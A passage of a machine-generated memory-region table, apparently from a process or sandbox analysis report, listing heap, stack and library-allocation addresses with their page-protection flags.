page read and write
|
||
23AC79E4000
|
heap
|
page read and write
|
||
1FC24F69000
|
heap
|
page read and write
|
||
28425E67000
|
heap
|
page read and write
|
||
24BA398A000
|
heap
|
page read and write
|
||
1407CA20000
|
trusted library allocation
|
page read and write
|
||
266F30A1000
|
heap
|
page read and write
|
||
1CE587B0000
|
heap
|
page read and write
|
||
1E0E17E6000
|
heap
|
page read and write
|
||
28425E35000
|
heap
|
page read and write
|
||
7FFAA939B000
|
trusted library allocation
|
page read and write
|
||
1A2CE4E0000
|
heap
|
page read and write
|
||
1407CA20000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1FC25359000
|
heap
|
page read and write
|
||
1FC252B9000
|
heap
|
page read and write
|
||
23AC5B50000
|
heap
|
page read and write
|
||
1E4CFA0F000
|
heap
|
page read and write
|
||
23097D2D000
|
heap
|
page read and write
|
||
7FFB1AB10000
|
unkown
|
page execute and read and write
|
||
D7414E3000
|
stack
|
page read and write
|
||
15773FE000
|
unkown
|
page readonly
|
||
1E0E1593000
|
heap
|
page read and write
|
||
239E4990000
|
trusted library allocation
|
page read and write
|
||
7FFAA9630000
|
trusted library allocation
|
page read and write
|
||
23098010000
|
heap
|
page read and write
|
||
76BB57A000
|
stack
|
page read and write
|
||
22972EC2000
|
heap
|
page read and write
|
||
1FC22D6C000
|
heap
|
page read and write
|
||
1E8E402B000
|
heap
|
page read and write
|
||
1FC22D1B000
|
heap
|
page read and write
|
||
270D21D0000
|
heap
|
page read and write
|
||
2422BEE0000
|
heap
|
page read and write
|
||
1DD0C660000
|
heap
|
page readonly
|
||
1DD0C808000
|
heap
|
page read and write
|
||
239FE921000
|
heap
|
page read and write
|
||
19BC6790000
|
heap
|
page read and write
|
||
1407C8F9000
|
heap
|
page read and write
|
||
7FFB0D740000
|
unkown
|
page read and write
|
||
13C87984000
|
heap
|
page read and write
|
||
1DD0C797000
|
heap
|
page read and write
|
||
1AB5E2A9000
|
heap
|
page read and write
|
||
2F198FF000
|
unkown
|
page read and write
|
||
22972EC2000
|
heap
|
page read and write
|
||
1E0D9A60000
|
direct allocation
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
270D222F000
|
heap
|
page read and write
|
||
1FC255FA000
|
heap
|
page read and write
|
||
1FC255FA000
|
heap
|
page read and write
|
||
1A2CE3BA000
|
heap
|
page read and write
|
||
1EA232D0000
|
heap
|
page read and write
|
||
1DD0C650000
|
heap
|
page read and write
|
||
1F52B8C7000
|
heap
|
page read and write
|
||
D8EC07F000
|
stack
|
page read and write
|
||
1690F75B000
|
heap
|
page read and write
|
||
239E4890000
|
heap
|
page read and write
|
||
1C55201E000
|
heap
|
page read and write
|
||
1E8E4120000
|
trusted library allocation
|
page execute
|
||
281FC346000
|
heap
|
page read and write
|
||
281FC346000
|
heap
|
page read and write
|
||
7FF74EF1E000
|
unkown
|
page readonly
|
||
1909D470000
|
heap
|
page read and write
|
||
1DD0FB32000
|
heap
|
page read and write
|
||
73D287F000
|
stack
|
page read and write
|
||
2B526767000
|
heap
|
page read and write
|
||
7FFB0C59C000
|
unkown
|
page execute and read and write
|
||
1FC25602000
|
heap
|
page read and write
|
||
1C550124000
|
heap
|
page read and write
|
||
23AC6114000
|
heap
|
page read and write
|
||
7FFAA95E0000
|
trusted library allocation
|
page read and write
|
||
2484A139000
|
heap
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
1FC255E0000
|
heap
|
page read and write
|
||
7FFAA9580000
|
trusted library allocation
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
281FC409000
|
heap
|
page read and write
|
||
7FFB1C251000
|
unkown
|
page execute and read and write
|
||
1FC24F4C000
|
heap
|
page read and write
|
||
1E0E1558000
|
heap
|
page read and write
|
||
23AC5BF0000
|
trusted library allocation
|
page read and write
|
||
266F303E000
|
heap
|
page read and write
|
||
1E0E1596000
|
heap
|
page read and write
|
||
130EAFC000
|
stack
|
page read and write
|
||
1FC25648000
|
heap
|
page read and write
|
||
7FFB0D740000
|
unkown
|
page read and write
|
||
1DEE7C85000
|
heap
|
page read and write
|
||
1FC255C2000
|
heap
|
page read and write
|
||
1E0E1555000
|
heap
|
page read and write
|
||
1E0D6800000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
1DD0FAE0000
|
heap
|
page read and write
|
||
1CEF2587000
|
heap
|
page read and write
|
||
1CE587D1000
|
heap
|
page read and write
|
||
20D43AD5000
|
heap
|
page read and write
|
||
13C87990000
|
heap
|
page read and write
|
||
2B526AF0000
|
heap
|
page read and write
|
||
2484A7DF000
|
heap
|
page read and write
|
||
1FC25308000
|
heap
|
page read and write
|
||
1FC22D70000
|
heap
|
page read and write
|
||
2422BD34000
|
heap
|
page read and write
|
||
76BB97C000
|
stack
|
page read and write
|
||
1B3A8250000
|
heap
|
page read and write
|
||
20C72DB1000
|
heap
|
page read and write
|
||
1E0D64BE000
|
heap
|
page read and write
|
||
1E4CF9FA000
|
heap
|
page read and write
|
||
281FC333000
|
heap
|
page read and write
|
||
1FC25569000
|
heap
|
page read and write
|
||
17FCEF90000
|
heap
|
page read and write
|
||
1C550135000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
7FF74EF0E000
|
unkown
|
page read and write
|
||
281FC514000
|
heap
|
page read and write
|
||
1FC2560E000
|
heap
|
page read and write
|
||
1FC253D7000
|
heap
|
page read and write
|
||
1DD0C799000
|
heap
|
page read and write
|
||
20D43B0B000
|
heap
|
page read and write
|
||
1FC25560000
|
heap
|
page read and write
|
||
1E0E1592000
|
heap
|
page read and write
|
||
28425E6C000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1FC260CA000
|
heap
|
page read and write
|
||
1BCD0E70000
|
heap
|
page read and write
|
||
2322B430000
|
heap
|
page read and write
|
||
51D40B2000
|
stack
|
page read and write
|
||
270D2275000
|
heap
|
page read and write
|
||
7FFB24AC1000
|
unkown
|
page execute and read and write
|
||
270D27AF000
|
heap
|
page read and write
|
||
2484A480000
|
heap
|
page read and write
|
||
267C15D0000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
7FF6DC701000
|
unkown
|
page execute read
|
||
7FFB0BB38000
|
unkown
|
page execute and read and write
|
||
1DEE7CB0000
|
heap
|
page read and write
|
||
1FC25681000
|
heap
|
page read and write
|
||
7FFAA96D0000
|
trusted library allocation
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1FC2561D000
|
heap
|
page read and write
|
||
1DEE7CA7000
|
heap
|
page read and write
|
||
7FFAA9610000
|
trusted library allocation
|
page read and write
|
||
1C550767000
|
heap
|
page read and write
|
||
26395BB0000
|
heap
|
page read and write
|
||
1DD0FA88000
|
heap
|
page read and write
|
||
24BA3970000
|
heap
|
page read and write
|
||
1FC2555C000
|
heap
|
page read and write
|
||
7FFAA9520000
|
trusted library allocation
|
page execute and read and write
|
||
266F36CF000
|
heap
|
page read and write
|
||
267A7906000
|
heap
|
page read and write
|
||
244EE050000
|
heap
|
page read and write
|
||
239FE9E4000
|
heap
|
page read and write
|
||
1CEF2086000
|
heap
|
page read and write
|
||
1C550767000
|
heap
|
page read and write
|
||
1909D567000
|
heap
|
page read and write
|
||
1DEE7C91000
|
heap
|
page read and write
|
||
2484A420000
|
heap
|
page read and write
|
||
1FC256A1000
|
heap
|
page read and write
|
||
1FC25652000
|
heap
|
page read and write
|
||
266F30A2000
|
heap
|
page read and write
|
||
16533605000
|
heap
|
page read and write
|
||
266F3091000
|
heap
|
page read and write
|
||
1FC22D71000
|
heap
|
page read and write
|
||
1E0E1555000
|
heap
|
page read and write
|
||
1FC25BC4000
|
direct allocation
|
page read and write
|
||
7DF448C80000
|
trusted library allocation
|
page execute and read and write
|
||
24B86AB5000
|
heap
|
page read and write
|
||
1FC2554B000
|
heap
|
page read and write
|
||
1E0D6463000
|
heap
|
page read and write
|
||
7FFB0C291000
|
unkown
|
page execute read
|
||
20C72DB1000
|
heap
|
page read and write
|
||
236408FD000
|
heap
|
page read and write
|
||
7FFB0C60F000
|
unkown
|
page execute and read and write
|
||
16533740000
|
heap
|
page read and write
|
||
1FC252EA000
|
heap
|
page read and write
|
||
1C550284000
|
heap
|
page read and write
|
||
1FC25566000
|
heap
|
page read and write
|
||
7FFB1AB01000
|
unkown
|
page execute and read and write
|
||
1DD0C80A000
|
heap
|
page read and write
|
||
2484A7F9000
|
heap
|
page read and write
|
||
1C550788000
|
heap
|
page read and write
|
||
B26CFFE000
|
stack
|
page read and write
|
||
267C189B000
|
heap
|
page read and write
|
||
239FE843000
|
heap
|
page read and write
|
||
1B3A8247000
|
heap
|
page read and write
|
||
1FC2519E000
|
heap
|
page read and write
|
||
1FC25659000
|
heap
|
page read and write
|
||
281FC414000
|
heap
|
page read and write
|
||
608A17F000
|
stack
|
page read and write
|
||
2C25F0B0000
|
heap
|
page read and write
|
||
20C72DB1000
|
heap
|
page read and write
|
||
1CEF3F74000
|
heap
|
page read and write
|
||
24545720000
|
heap
|
page read and write
|
||
270D2244000
|
heap
|
page read and write
|
||
1E8E4120000
|
heap
|
page read and write
|
||
1FC24F6A000
|
heap
|
page read and write
|
||
2637A165000
|
heap
|
page read and write
|
||
1407CAA0000
|
trusted library allocation
|
page read and write
|
||
23097D42000
|
heap
|
page read and write
|
||
1E0E15FB000
|
heap
|
page read and write
|
||
23AC6139000
|
heap
|
page read and write
|
||
1FC2519E000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1FC255A0000
|
heap
|
page read and write
|
||
1C55012B000
|
heap
|
page read and write
|
||
D8141FF000
|
stack
|
page read and write
|
||
17FCF052000
|
heap
|
page read and write
|
||
EE6D73D000
|
stack
|
page read and write
|
||
7FFB1E4C1000
|
unkown
|
page execute and read and write
|
||
26379E71000
|
heap
|
page read and write
|
||
1FC252E8000
|
heap
|
page read and write
|
||
7FFB0B81D000
|
unkown
|
page execute and read and write
|
||
1690F74D000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
29AC2485000
|
heap
|
page read and write
|
||
1DD0FAA0000
|
heap
|
page read and write
|
||
270D2224000
|
heap
|
page read and write
|
||
2484A162000
|
heap
|
page read and write
|
||
1FC25360000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
1C552024000
|
heap
|
page read and write
|
||
267C166E000
|
heap
|
page read and write
|
||
1E0D7EA3000
|
direct allocation
|
page read and write
|
||
1DD0F9F1000
|
heap
|
page read and write
|
||
7FFB0C611000
|
unkown
|
page execute and write copy
|
||
1E5FA77A000
|
heap
|
page read and write
|
||
7FFAA9382000
|
trusted library allocation
|
page read and write
|
||
1FC25631000
|
heap
|
page read and write
|
||
1CEF209D000
|
heap
|
page read and write
|
||
281FE172000
|
heap
|
page read and write
|
||
270D2266000
|
heap
|
page read and write
|
||
239E63F0000
|
heap
|
page execute and read and write
|
||
7D447FE000
|
unkown
|
page read and write
|
||
23AC79E3000
|
heap
|
page read and write
|
||
1E8E3FEB000
|
heap
|
page read and write
|
||
1E4CF820000
|
heap
|
page read and write
|
||
7FFAA9532000
|
trusted library allocation
|
page read and write
|
||
23DC40F0000
|
heap
|
page read and write
|
||
1FC25680000
|
heap
|
page read and write
|
||
9A8613D000
|
stack
|
page read and write
|
||
1C55077F000
|
heap
|
page read and write
|
||
1E0E15EE000
|
heap
|
page read and write
|
||
7FFAA938D000
|
trusted library allocation
|
page execute and read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
266F3130000
|
heap
|
page read and write
|
||
1FC25B08000
|
direct allocation
|
page read and write
|
||
1DCE30EA000
|
heap
|
page read and write
|
||
93AF6FF000
|
stack
|
page read and write
|
||
1FC26610000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
20D43D90000
|
heap
|
page read and write
|
||
2484A15F000
|
heap
|
page read and write
|
||
1F52B730000
|
heap
|
page read and write
|
||
1576CFB000
|
stack
|
page read and write
|
||
1E181CEA000
|
heap
|
page read and write
|
||
1E8E4047000
|
heap
|
page read and write
|
||
2BA9E6E1000
|
heap
|
page read and write
|
||
23AC5C4B000
|
heap
|
page read and write
|
||
270D21E2000
|
heap
|
page read and write
|
||
281FC35D000
|
heap
|
page read and write
|
||
1FC25FC9000
|
heap
|
page read and write
|
||
1FC25407000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
20D43AFD000
|
heap
|
page read and write
|
||
1FC22CAB000
|
heap
|
page read and write
|
||
1C5500B8000
|
heap
|
page read and write
|
||
1DEE7C97000
|
heap
|
page read and write
|
||
267C197E000
|
heap
|
page read and write
|
||
236408A6000
|
heap
|
page read and write
|
||
270D223F000
|
heap
|
page read and write
|
||
1E0E1624000
|
heap
|
page read and write
|
||
1E4CF9C0000
|
heap
|
page read and write
|
||
7FFAA9690000
|
trusted library allocation
|
page read and write
|
||
1AB5E274000
|
heap
|
page read and write
|
||
1FC24F70000
|
direct allocation
|
page read and write
|
||
1C5507A0000
|
heap
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
2484A7DE000
|
heap
|
page read and write
|
||
1C55012B000
|
heap
|
page read and write
|
||
7FFB0C3F4000
|
unkown
|
page execute and read and write
|
||
1FC25368000
|
heap
|
page read and write
|
||
1FC25649000
|
heap
|
page read and write
|
||
BAC7DFF000
|
unkown
|
page read and write
|
||
1B3A8374000
|
heap
|
page read and write
|
||
1FC25656000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
270D27CA000
|
heap
|
page read and write
|
||
23AC610F000
|
heap
|
page read and write
|
||
1CEF268A000
|
heap
|
page read and write
|
||
267A7796000
|
heap
|
page read and write
|
||
1FC2573A000
|
heap
|
page read and write
|
||
1FC22D84000
|
heap
|
page read and write
|
||
22972EA0000
|
heap
|
page read and write
|
||
1E0E1571000
|
heap
|
page read and write
|
||
1E0E2FAE000
|
heap
|
page read and write
|
||
266F36D9000
|
heap
|
page read and write
|
||
1E4CFA12000
|
heap
|
page read and write
|
||
1AB5E297000
|
heap
|
page read and write
|
||
886BEFC000
|
stack
|
page read and write
|
||
1FC251AF000
|
heap
|
page read and write
|
||
266F36BC000
|
heap
|
page read and write
|
||
1E0E1585000
|
heap
|
page read and write
|
||
1E4CFC84000
|
heap
|
page read and write
|
||
2484A7D7000
|
heap
|
page read and write
|
||
2BA9E6E1000
|
heap
|
page read and write
|
||
1E0E1582000
|
heap
|
page read and write
|
||
1E4CF9E5000
|
heap
|
page read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
1C55013A000
|
heap
|
page read and write
|
||
1FC2535B000
|
heap
|
page read and write
|
||
1DEE7CBF000
|
heap
|
page read and write
|
||
7FFB0C2B5000
|
unkown
|
page readonly
|
||
1407C8EB000
|
heap
|
page read and write
|
||
7FFB1C3B1000
|
unkown
|
page execute read
|
||
1FC25337000
|
heap
|
page read and write
|
||
7FFB0D745000
|
unkown
|
page readonly
|
||
1CB96DD0000
|
heap
|
page read and write
|
||
2484A7DC000
|
heap
|
page read and write
|
||
1FC25536000
|
heap
|
page read and write
|
||
1FC25601000
|
heap
|
page read and write
|
||
1FC25344000
|
heap
|
page read and write
|
||
1DD0FA93000
|
heap
|
page read and write
|
||
1FC25F87000
|
heap
|
page read and write
|
||
7FFAA9680000
|
trusted library allocation
|
page read and write
|
||
270D222F000
|
heap
|
page read and write
|
||
1DEE7CA8000
|
heap
|
page read and write
|
||
1E5FA995000
|
heap
|
page read and write
|
||
1690F8D0000
|
heap
|
page read and write
|
||
1FC25549000
|
heap
|
page read and write
|
||
7FF6DC701000
|
unkown
|
page execute read
|
||
23195FD2000
|
heap
|
page read and write
|
||
1AB5E297000
|
heap
|
page read and write
|
||
1FC24630000
|
heap
|
page read and write
|
||
7FF6DC701000
|
unkown
|
page execute read
|
||
2484A484000
|
heap
|
page read and write
|
||
1E0D64D1000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
1690FA00000
|
heap
|
page read and write
|
||
D6E79FF000
|
unkown
|
page read and write
|
||
15770FE000
|
unkown
|
page readonly
|
||
266F36C4000
|
heap
|
page read and write
|
||
1DD0FAE0000
|
heap
|
page read and write
|
||
26395E85000
|
heap
|
page read and write
|
||
7FFAA96E0000
|
trusted library allocation
|
page read and write
|
||
7FF74EEF9000
|
unkown
|
page write copy
|
||
157727E000
|
stack
|
page read and write
|
||
1DD0FA93000
|
heap
|
page read and write
|
||
1576DFE000
|
unkown
|
page readonly
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
E6C167F000
|
stack
|
page read and write
|
||
23AC610C000
|
heap
|
page read and write
|
||
16533605000
|
heap
|
page read and write
|
||
1E0E15CF000
|
heap
|
page read and write
|
||
1CEF25A9000
|
heap
|
page read and write
|
||
1FC255A2000
|
heap
|
page read and write
|
||
7FFAA953A000
|
trusted library allocation
|
page read and write
|
||
1CE587BA000
|
heap
|
page read and write
|
||
25D4E191000
|
heap
|
page read and write
|
||
2484A802000
|
heap
|
page read and write
|
||
1E5FA880000
|
heap
|
page read and write
|
||
2422BE00000
|
heap
|
page read and write
|
||
7FFB0C2A6000
|
unkown
|
page readonly
|
||
1909D570000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1E8E34FE000
|
trusted library allocation
|
page read and write
|
||
1909D450000
|
heap
|
page read and write
|
||
24B8694A000
|
heap
|
page read and write
|
||
1FC253A0000
|
heap
|
page read and write
|
||
1FC251DD000
|
heap
|
page read and write
|
||
1E0D645C000
|
heap
|
page read and write
|
||
281FC31A000
|
heap
|
page read and write
|
||
266F36A3000
|
heap
|
page read and write
|
||
1FC24F55000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
281FC510000
|
heap
|
page read and write
|
||
1CB96E14000
|
heap
|
page read and write
|
||
1FC25307000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
1E0E15FB000
|
heap
|
page read and write
|
||
1E0E1624000
|
heap
|
page read and write
|
||
7FFB24AC9000
|
unkown
|
page execute and read and write
|
||
1E0D64B8000
|
heap
|
page read and write
|
||
270D2244000
|
heap
|
page read and write
|
||
281FC318000
|
heap
|
page read and write
|
||
1407B2B0000
|
heap
|
page read and write
|
||
7FFB1C250000
|
unkown
|
page readonly
|
||
601B3FF000
|
stack
|
page read and write
|
||
1FC24F4F000
|
heap
|
page read and write
|
||
1DEE7C91000
|
heap
|
page read and write
|
||
1E0D6419000
|
heap
|
page read and write
|
||
1E0D6434000
|
heap
|
page read and write
|
||
20D43C80000
|
heap
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
165334E0000
|
heap
|
page read and write
|
||
7FFB0C3E9000
|
unkown
|
page execute and read and write
|
||
1E181EB0000
|
heap
|
page read and write
|
||
23AC60F2000
|
heap
|
page read and write
|
||
270D227C000
|
heap
|
page read and write
|
||
267AA293000
|
trusted library allocation
|
page read and write
|
||
1CEF20AF000
|
heap
|
page read and write
|
||
1C550150000
|
trusted library allocation
|
page read and write
|
||
1CEF2683000
|
heap
|
page read and write
|
||
1E0E30AD000
|
heap
|
page read and write
|
||
2484A157000
|
heap
|
page read and write
|
||
1E7B5EB0000
|
heap
|
page read and write
|
||
D6E78FC000
|
stack
|
page read and write
|
||
2484A165000
|
heap
|
page read and write
|
||
28425E6A000
|
heap
|
page read and write
|
||
2BA9E6E1000
|
heap
|
page read and write
|
||
2484A156000
|
heap
|
page read and write
|
||
1CEF20A1000
|
heap
|
page read and write
|
||
26379E71000
|
heap
|
page read and write
|
||
2584DAC0000
|
heap
|
page read and write
|
||
266F3020000
|
trusted library allocation
|
page read and write
|
||
1DD0FAB4000
|
heap
|
page read and write
|
||
7FFAA9538000
|
trusted library allocation
|
page read and write
|
||
1FC26120000
|
heap
|
page read and write
|
||
1E0E15BA000
|
heap
|
page read and write
|
||
1407C8D4000
|
heap
|
page read and write
|
||
7FFB24ACB000
|
unkown
|
page execute and read and write
|
||
239E6253000
|
trusted library allocation
|
page read and write
|
||
1E0E1628000
|
heap
|
page read and write
|
||
7FF6DC741000
|
unkown
|
page read and write
|
||
1CEF1F90000
|
heap
|
page read and write
|
||
27EA9A78000
|
heap
|
page read and write
|
||
266F36C4000
|
heap
|
page read and write
|
||
7FFB0BAE2000
|
unkown
|
page execute and read and write
|
||
1FC25C48000
|
direct allocation
|
page read and write
|
||
267AA9F7000
|
trusted library allocation
|
page read and write
|
||
236408A4000
|
heap
|
page read and write
|
||
1E0E2FB1000
|
heap
|
page read and write
|
||
7FFAA9640000
|
trusted library allocation
|
page read and write
|
||
266F36A5000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1E0D64B7000
|
heap
|
page read and write
|
||
1FC2527D000
|
heap
|
page read and write
|
||
1FC2561E000
|
heap
|
page read and write
|
||
1CEF268E000
|
heap
|
page read and write
|
||
1E0D9B60000
|
direct allocation
|
page read and write
|
||
7FFAA9390000
|
trusted library allocation
|
page read and write
|
||
23AC5C44000
|
heap
|
page read and write
|
||
1AB5E297000
|
heap
|
page read and write
|
||
1C550123000
|
heap
|
page read and write
|
||
7FFAA9660000
|
trusted library allocation
|
page read and write
|
||
1CEF25A0000
|
heap
|
page read and write
|
||
266F30A2000
|
heap
|
page read and write
|
||
1B3A8250000
|
heap
|
page read and write
|
||
8F79BFF000
|
stack
|
page read and write
|
||
76BB9FE000
|
stack
|
page read and write
|
||
26395B30000
|
heap
|
page read and write
|
||
267AA6F9000
|
trusted library allocation
|
page read and write
|
||
73D277E000
|
stack
|
page read and write
|
||
1E0D645A000
|
heap
|
page read and write
|
||
7FFAA95C0000
|
trusted library allocation
|
page read and write
|
||
1DD0FBF9000
|
heap
|
page read and write
|
||
270D2274000
|
heap
|
page read and write
|
||
270D27BF000
|
heap
|
page read and write
|
||
26395B9D000
|
heap
|
page read and write
|
||
266F2F20000
|
heap
|
page read and write
|
||
202E5970000
|
heap
|
page read and write
|
||
1E0D9AC0000
|
direct allocation
|
page read and write
|
||
8F79B7E000
|
stack
|
page read and write
|
||
7FFB0C42E000
|
unkown
|
page execute and read and write
|
||
1FC2526D000
|
heap
|
page read and write
|
||
7FFB18B71000
|
unkown
|
page execute and read and write
|
||
1C552024000
|
heap
|
page read and write
|
||
1B3A8250000
|
heap
|
page read and write
|
||
239E6250000
|
trusted library allocation
|
page read and write
|
||
1FC25358000
|
heap
|
page read and write
|
||
1FC2532D000
|
heap
|
page read and write
|
||
7FFB0BECF000
|
unkown
|
page execute and read and write
|
||
1DD0C7C3000
|
heap
|
page read and write
|
||
7FFB0C410000
|
unkown
|
page readonly
|
||
20D43D94000
|
heap
|
page read and write
|
||
1FC2519E000
|
heap
|
page read and write
|
||
7FF6DC742000
|
unkown
|
page read and write
|
||
1FC25C44000
|
direct allocation
|
page read and write
|
||
20C72DB1000
|
heap
|
page read and write
|
||
1EA2311F000
|
heap
|
page read and write
|
||
1690F700000
|
heap
|
page read and write
|
||
239FE7FF000
|
heap
|
page read and write
|
||
2484C18E000
|
heap
|
page read and write
|
||
1C55079F000
|
heap
|
page read and write
|
||
1E8E402B000
|
heap
|
page read and write
|
||
23AC5B41000
|
heap
|
page read and write
|
||
267AAA0F000
|
trusted library allocation
|
page read and write
|
||
1FC24E75000
|
heap
|
page read and write
|
||
1FC25320000
|
heap
|
page read and write
|
||
1FC22D12000
|
heap
|
page read and write
|
||
1FC251C9000
|
heap
|
page read and write
|
||
19BC6519000
|
heap
|
page read and write
|
||
7FFB0BB30000
|
unkown
|
page execute and read and write
|
||
19BC6521000
|
heap
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
1FC255FA000
|
heap
|
page read and write
|
||
1C5507A2000
|
heap
|
page read and write
|
||
E6BFDFF000
|
unkown
|
page read and write
|
||
7FFB1E4CC000
|
unkown
|
page read and write
|
||
239E4A00000
|
heap
|
page execute and read and write
|
||
D7414E1000
|
stack
|
page read and write
|
||
1FC22D69000
|
heap
|
page read and write
|
||
7FFB0D745000
|
unkown
|
page readonly
|
||
1C5500A1000
|
heap
|
page read and write
|
||
1FC2535F000
|
heap
|
page read and write
|
||
1CE587D1000
|
heap
|
page read and write
|
||
1DD0FB1A000
|
heap
|
page read and write
|
||
1FC24E8B000
|
heap
|
page read and write
|
||
1407C751000
|
trusted library allocation
|
page read and write
|
||
13C876A1000
|
heap
|
page read and write
|
||
7FF6DC744000
|
unkown
|
page readonly
|
||
1FC251B0000
|
heap
|
page read and write
|
||
1E0D64AF000
|
heap
|
page read and write
|
||
135F05ED000
|
heap
|
page read and write
|
||
2C25F0B4000
|
heap
|
page read and write
|
||
15772FE000
|
unkown
|
page readonly
|
||
7FFB0B7FC000
|
unkown
|
page execute and read and write
|
||
245454E0000
|
heap
|
page read and write
|
||
1FC264B4000
|
heap
|
page read and write
|
||
1FC22D70000
|
heap
|
page read and write
|
||
1E8E3FF1000
|
heap
|
page read and write
|
||
1CEF2230000
|
heap
|
page read and write
|
||
281FC348000
|
heap
|
page read and write
|
||
1690F75B000
|
heap
|
page read and write
|
||
776F9FF000
|
unkown
|
page read and write
|
||
23AC60F7000
|
heap
|
page read and write
|
||
267C164E000
|
heap
|
page read and write
|
||
2484A152000
|
heap
|
page read and write
|
||
1FC2560F000
|
heap
|
page read and write
|
||
267A9196000
|
trusted library allocation
|
page read and write
|
||
281FC352000
|
heap
|
page read and write
|
||
135F0601000
|
heap
|
page read and write
|
||
1FC24ECD000
|
heap
|
page read and write
|
||
266F36AE000
|
heap
|
page read and write
|
||
239E4934000
|
heap
|
page read and write
|
||
1E181D00000
|
heap
|
page read and write
|
||
1E0E15D6000
|
heap
|
page read and write
|
||
1FC255D5000
|
heap
|
page read and write
|
||
1909D550000
|
heap
|
page read and write
|
||
1FC26120000
|
heap
|
page read and write
|
||
7FFB0C290000
|
unkown
|
page readonly
|
||
1FC25443000
|
heap
|
page read and write
|
||
26395E84000
|
heap
|
page read and write
|
||
1FC256FA000
|
heap
|
page read and write
|
||
23AC5AE0000
|
trusted library allocation
|
page read and write
|
||
239E4A74000
|
heap
|
page read and write
|
||
1E0D64C1000
|
heap
|
page read and write
|
||
23AC5AF8000
|
heap
|
page read and write
|
||
267AA024000
|
trusted library allocation
|
page read and write
|
||
1407B273000
|
heap
|
page read and write
|
||
1DD0C75E000
|
heap
|
page read and write
|
||
21B1C060000
|
heap
|
page read and write
|
||
2484A7E4000
|
heap
|
page read and write
|
||
76BB273000
|
stack
|
page read and write
|
||
1E8E352F000
|
trusted library allocation
|
page read and write
|
||
239FE8E0000
|
heap
|
page read and write
|
||
24545710000
|
heap
|
page read and write
|
||
1FC25F7C000
|
heap
|
page read and write
|
||
1E8E41E2000
|
heap
|
page read and write
|
||
1E7B5F04000
|
heap
|
page read and write
|
||
1CEF20A1000
|
heap
|
page read and write
|
||
1E0D7E60000
|
direct allocation
|
page read and write
|
||
267A7830000
|
heap
|
page readonly
|
||
8251DDE000
|
stack
|
page read and write
|
||
1FC2536E000
|
heap
|
page read and write
|
||
1C552026000
|
heap
|
page read and write
|
||
1DCE32C4000
|
heap
|
page read and write
|
||
1FC2573D000
|
heap
|
page read and write
|
||
1E0E1572000
|
heap
|
page read and write
|
||
1FC24E8E000
|
heap
|
page read and write
|
||
1E0D9B21000
|
direct allocation
|
page read and write
|
||
1E0E1626000
|
heap
|
page read and write
|
||
267A774F000
|
heap
|
page read and write
|
||
7FF6DC72B000
|
unkown
|
page readonly
|
||
24BA3982000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
27EA9A82000
|
heap
|
page read and write
|
||
239E6414000
|
heap
|
page read and write
|
||
1C550131000
|
heap
|
page read and write
|
||
1407C794000
|
trusted library allocation
|
page read and write
|
||
2F1957C000
|
stack
|
page read and write
|
||
2BA9E560000
|
heap
|
page read and write
|
||
1E8E34F7000
|
trusted library allocation
|
page read and write
|
||
1FC2535A000
|
heap
|
page read and write
|
||
1909D55A000
|
heap
|
page read and write
|
||
2484A178000
|
heap
|
page read and write
|
||
1E0E14A0000
|
heap
|
page read and write
|
||
281FC515000
|
heap
|
page read and write
|
||
13C87790000
|
heap
|
page read and write
|
||
7FFB0C2B2000
|
unkown
|
page readonly
|
||
1C550134000
|
heap
|
page read and write
|
||
1FC255DE000
|
heap
|
page read and write
|
||
1E0E15EF000
|
heap
|
page read and write
|
||
1FC25641000
|
heap
|
page read and write
|
||
1FC24F56000
|
heap
|
page read and write
|
||
1FC26120000
|
heap
|
page read and write
|
||
13C87699000
|
heap
|
page read and write
|
||
1C5500C2000
|
heap
|
page read and write
|
||
266F4F65000
|
heap
|
page read and write
|
||
D7414D4000
|
stack
|
page read and write
|
||
281FC544000
|
heap
|
page read and write
|
||
281FC51E000
|
heap
|
page read and write
|
||
1FC25358000
|
heap
|
page read and write
|
||
1407B291000
|
heap
|
page read and write
|
||
1EA24C20000
|
heap
|
page read and write
|
||
1FC25616000
|
heap
|
page read and write
|
||
27EA9BC0000
|
heap
|
page read and write
|
||
23AC5B5C000
|
heap
|
page read and write
|
||
7FFAA9590000
|
trusted library allocation
|
page read and write
|
||
270D223E000
|
heap
|
page read and write
|
||
8BBB9FE000
|
unkown
|
page read and write
|
||
1E0E15DD000
|
heap
|
page read and write
|
||
2F199FF000
|
stack
|
page read and write
|
||
239FE806000
|
heap
|
page read and write
|
||
1407C280000
|
trusted library allocation
|
page read and write
|
||
1E0E160D000
|
heap
|
page read and write
|
||
7FFB0BA8B000
|
unkown
|
page execute and read and write
|
||
1FC25770000
|
direct allocation
|
